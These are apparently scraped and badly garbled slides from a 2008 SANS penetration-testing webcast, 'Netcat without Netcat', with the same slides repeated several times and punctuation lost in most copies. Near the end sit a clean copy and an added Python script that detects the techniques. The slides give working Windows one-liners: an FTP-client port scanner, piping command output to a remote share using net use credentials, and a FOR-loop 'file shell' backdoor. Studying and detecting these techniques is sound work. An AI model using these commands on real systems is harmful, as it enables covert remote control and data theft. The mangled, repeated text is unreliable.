ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 29: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 30: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 31: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard...
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files

File Transfer in Action

Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
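From the defender's side, the two tricks on these slides (redirecting a command's standard output to a UNC share, and the FOR /L file shell) leave recognizable process command lines. The Python script below is an added example, not part of Ed Skoudis's deck or the SANS course material: it runs a few pattern checks over constructed process-creation records and reports which records match. The field names pid, image and cmdline are an assumption loosely modelled on Sysmon Event ID 1, and the host 10.0.0.5, the share names and the password Password1 are made-up sample values.

```python
"""Detection-side companion to the "Netcat without Netcat" slides: flag
process-creation records whose command line redirects output to a UNC share,
maps a share with explicit credentials, or runs the FOR /L file-shell loop.
Added example; the records below are constructed, not captured from a host."""
import re
from typing import Dict, List

# Constructed records, loosely shaped like Sysmon Event ID 1 (assumed field
# names).  Hosts, shares and the password are made-up sample values.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "1001", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c type secrets.txt > \\10.0.0.5\share\secrets.txt"},
    {"pid": "1002", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\10.0.0.5 Password1 /u:tester"},
    {"pid": "1003", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in '
                r"(commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) "
                r"& ping -n 2 127.0.0.1"},
    # Benign look-alikes: a counted FOR /L loop and a plain copy to a share.
    {"pid": "1004", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c for /L %i in (1,1,10) do echo %i"},
    {"pid": "1005", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy report.docx \\fileserver\public\report.docx"},
]

# ">" or ">>" whose target is a \\host\share\... path: stdout leaving the box.
UNC_REDIRECT = re.compile(r">>?\s*\\\\[^\s\\]+\\\S+")
# "net use \\host ... /u:" (or /user:): a share mapped with explicit credentials.
NET_USE_CREDS = re.compile(r"\bnet\s+use\s+\\\\\S+.*?/u(?:ser)?:", re.IGNORECASE)
# FOR /L with a step of 0 never terminates; that is the file shell's outer loop.
INFINITE_FOR_L = re.compile(
    r"for\s+/L\s+%%?\w+\s+in\s*\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)", re.IGNORECASE)
# FOR /F iterating over the lines of a file ...
FOR_F_FILE = re.compile(r"for\s+/f\b.*?\bin\s*\(\s*[\w.\\:-]+\s*\)", re.IGNORECASE)
# ... whose body executes the loop variable, i.e. runs whatever the file says.
EXEC_LOOP_VAR = re.compile(
    r"\bdo\s+(?:cmd(?:\.exe)?\s+/[ck]\s+)?%%?[A-Za-z]\b", re.IGNORECASE)
APPEND_REDIRECT = re.compile(r">>\s*\S+")
# "ping -n N 127.0.0.1" is cmd.exe's stand-in for sleep; a supporting signal.
PING_SLEEP = re.compile(r"ping\s+-n\s+\d+\s+127\.0\.0\.1", re.IGNORECASE)


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the names of every pattern the record's command line matches."""
    cmd = event["cmdline"]
    findings: List[str] = []
    if UNC_REDIRECT.search(cmd):
        findings.append("stdout_redirected_to_unc_share")
    if NET_USE_CREDS.search(cmd):
        findings.append("net_use_with_explicit_credentials")
    # The file shell needs all three parts together; a counted loop, or a
    # FOR /F that merely echoes, does not qualify.
    endless = bool(INFINITE_FOR_L.search(cmd))
    runs_file_lines = bool(FOR_F_FILE.search(cmd)) and bool(EXEC_LOOP_VAR.search(cmd))
    appends = bool(APPEND_REDIRECT.search(cmd))
    if endless and runs_file_lines and appends:
        findings.append("for_loop_file_shell")
    elif endless and PING_SLEEP.search(cmd):
        findings.append("endless_for_loop_with_ping_sleep")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map pid -> findings for every record that matched at least one pattern."""
    hits: Dict[str, List[str]] = {}
    for event in events:
        found = analyze(event)
        if found:
            hits[event["pid"]] = found
    return hits


if __name__ == "__main__":
    for pid, found in scan(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(found)}")
```

The file-shell rule fires only when the endless FOR /L loop, the FOR /F that executes lines read from a file, and the append redirection all appear in one command line, so the counted loop and the plain copy to a share in the sample set stay quiet; an endless loop that merely sleeps with ping is reported separately as the weaker signal it is. On a real host the same checks would run over process-creation telemetry rather than the embedded list.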

The File Shell In Action

Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details

Outline

• Why Penetration Testing
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
